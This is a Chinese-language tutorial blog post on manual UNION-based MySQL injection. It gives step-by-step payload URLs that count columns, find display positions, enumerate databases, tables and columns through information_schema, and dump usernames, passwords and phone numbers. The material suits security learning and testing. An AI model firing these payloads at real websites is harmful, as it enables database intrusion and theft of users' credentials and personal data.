美文网首页
MySQL手工注入

MySQL手工注入

作者: 好好睡觉鸭 | 来源:发表于2020-10-29 15:53 被阅读0次

一些手工注入基础
(以数字型为例,字符型需要单引号'闭合)

1、oder by

http://url?id=1+order+by+{num}

num=n 正常
num=n+1 错误

2、联合查询

http://url?id=1+union+select+1,2,3,......,n+--

页面出现显示位:


显示位

3、爆破库名

http://url?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(schema_name)+from+information_schema.schemata+--

一般是放在显示位最后一位,如上所示;若放在其他显示位payload如下:

http://url?id=1+union+select+1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.schemata+--
数据库查询

4、爆破表名

http://url?id=1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=0x776562706870{库名的16进制}+--
表名查询

5、爆破列名

http://url?id=1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=0x6563735f7573657273{表名的16进制}+--
列名查询

6、读取数据

http://url?id=1+union+select+1,group_concat(user_name,0x7e,password,0x7e,mobile_phone),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+{table_name}+--
读数据

相关文章

  • Mysql时间盲注手工注入详解

    此文章建立在已经阅读并掌握了《Mysql 联合查询手工注入详解》和Mysql 布尔型盲注手工注入详解的基础上 练习...

  • mysql手工注入

    mysql数据库结构: SQL层的功能: 判断语法,语句,语义数据库对象授权情况判断,授权失败不继续解析(解析器)...

  • Mysql手工注入

    整理一下手工注入笔记,以sqli-labs环境为例。 1.Mysql手工union联合查询注入 输入单引号,页面报...

  • MySQL手工注入

    搜索php网站 判断是否存在注入漏洞 例如得到网站:http://www.star-reach.com/galle...

  • mysql手工注入

    SQL基础 1.1 什么是sql? SQL(structured query language),即结构化查询语言...

  • MySQL手工注入

    一些手工注入基础(以数字型为例,字符型需要单引号'闭合) 1、oder by num=n 正常num=n+1 错误...

  • web训练sql注入中级练习-墨者学堂

    sql注入实战mysql(进阶版) 看这个是base64编码 手工注入注入不出来。。。 使用sqlmap跑提示使用...

  • mysql手工注入总结

    今天我们来讲一下mysql手工注入的大体内容 给你一段url http://lab1.xseclab.com/sq...

  • Mysql手工注入小结

    前言 实习电话面的时候,问到了sql注入的利用,我扒拉扒拉一大堆,结果脑子一抽,说Mysql注入不支持堆叠注入 我...

  • 2019-11-13

    mysql手工注入 一、SQL注入的理解 将特殊SQL语句添加到查询url后面,以获取非法的数据的操作。 ...

网友评论

      本文标题:MySQL手工注入

      本文链接:https://www.haomeiwen.com/subject/rhkcvktx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|MySQL手工注入|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!